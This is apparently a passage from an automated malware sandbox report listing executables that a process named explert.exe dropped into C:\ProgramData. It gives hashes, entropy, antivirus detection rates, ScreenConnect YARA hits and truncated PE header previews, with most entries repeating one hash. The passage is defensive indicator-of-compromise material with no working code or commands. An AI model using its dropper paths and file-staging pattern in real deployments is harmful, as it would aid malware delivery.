                                                                                                                                                                                          No context

                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                          No context

                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                          No context

                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                          C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\3HvoFOAmEaJswFCHOzyfyz5b.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\6KZmcK8r6beUzmRf6Ci6nx8d.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):697856
                                                                                                                                                                                          Entropy (8bit):6.928945768865187
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:Llq9SNKjqNUt5LRfyUgpBvBV9aPp2exoxNxFhWuR4OM8AfCZghsWT9FLUI/D/vqO:Ll+SNKeslybnBOexBO
                                                                                                                                                                                          MD5:4F5771AA008FB55801A3F9FBA7130F69
                                                                                                                                                                                          SHA1:EAACE725791C08810198C08907B84B8850D4EF5B
                                                                                                                                                                                          SHA-256:447ED0BDF4F8D0479545724B9578D2A3296B6BC5E2162D7BA405276234ECCF0D
                                                                                                                                                                                          SHA-512:0CE8C4C44338D92F4A5F07F38A93812A85CE5524A4ED0C4E4D616127EA6FE02E94DF0938075B4D2DC3EEAD2FAC4A827230B0D2E1333BB51146D92417B1A5BFEC
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 76%, Browse
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................>.... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H.......HK...m......r...................................................l~.:........[s.vu.GH..9os.63.bG.I.........Z].0p.Q..u.........'G;...{z..g0o.}C..F..m^...Q.J...........;x.0..DI..,J?.U.6.q1=...dS.k;.]+j..`[..C..@...<..|..uE....q/V...h....y.6lj.....A..N. ..a...Q.h...}XW.}.?...m0K..9..f.....eD.I..:AZn......"A.........>.(.#....3j.........r.L..$Wp...m.....I..WQ..On...$.}%.Z..u.I.!k...,.g[.lj..(v...t....;PK.....w#.].......6...v.s:.!..[.!G..i{...5...Pds.s

                                                                                                                                                                                          C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1180160
                                                                                                                                                                                          Entropy (8bit):7.703603560955088
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:KmUPjztESBDhakdbtl7vq6bknwKTaA9Cpr2r:KmUPv+eldbtl7i6FKeFpy
                                                                                                                                                                                          MD5:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          SHA1:E9EA82EA8199BCB882B933A90707D7CA71F25899
                                                                                                                                                                                          SHA-256:FA480B199885433840ABE9D506CCF32FC75FC1DD771695CCE2DCB4F438A98D00
                                                                                                                                                                                          SHA-512:FC62B3CD4067F2CD11AF16B2F1130DC21135B5E23100CB5ACAF2C235B9C1DB128110E5BB4BF38FC438666649E4C865524B9ECF67695FBD080AA3D349D627BC5C
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                                                          • Antivirus: Virustotal, Detection: 74%, Browse
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*..y..y..y..+y..yvZ.x..yvZ.x..yvZ.x..ys..x..y..y..y..y..yGY.x..yRich..y........PE..d....P.f.........."....'.....z......0..........@.............................@............`.................................................|...h................,...........0.......v..T....................x..(....t..@...............h............................text... ........................... ..`.rdata..X2.......4..................@..@.data...............................@....pdata...,..........................@..@_RDATA....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\b1s7nlT2NqFJ3sl3xbYiMCIq.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:modified
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\b1s7nlT2NqFJ3sl3xbYiMCIq.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
                                                                                                                                                                                          Entropy (8bit):7.437063088535606
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:98304:C9s6efPGi9gOTXohA4sJNtxutjIeGq7tq5O8TjoIi88Q:YfefPGi9gOTXsstxwMsvz
                                                                                                                                                                                          MD5:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          SHA1:C3B5ADC55749AA4C60FD94FB75831966C012BEAA
                                                                                                                                                                                          SHA-256:D2DAD56F10F5700FF7435A73010CCD4EBC2B6740EC4D5033E44EC382384C442C
                                                                                                                                                                                          SHA-512:8A001F5343A90E13A84398F8339D15FAECBD1F209B631A9FDD4E67A5FCB170DACB25466E43CFDF35AF7F6545ECD71127DE3AF2E7BEAC7E08E6FF1661E513B741
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`...O>`...?>`...]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF.A>`.[l.F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`.................PE..L.....wc...............!..... T...................@.......................... U.......U...@..................................)..P....`..|.S...........T.8_....U..... ...p...........................`...@...............<............................text............................... ..`.rdata..x`.......b..................@..@.data........@......................@....rsrc...|.S..`....S.. ..............@..@.reloc........U.......T.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):5649720
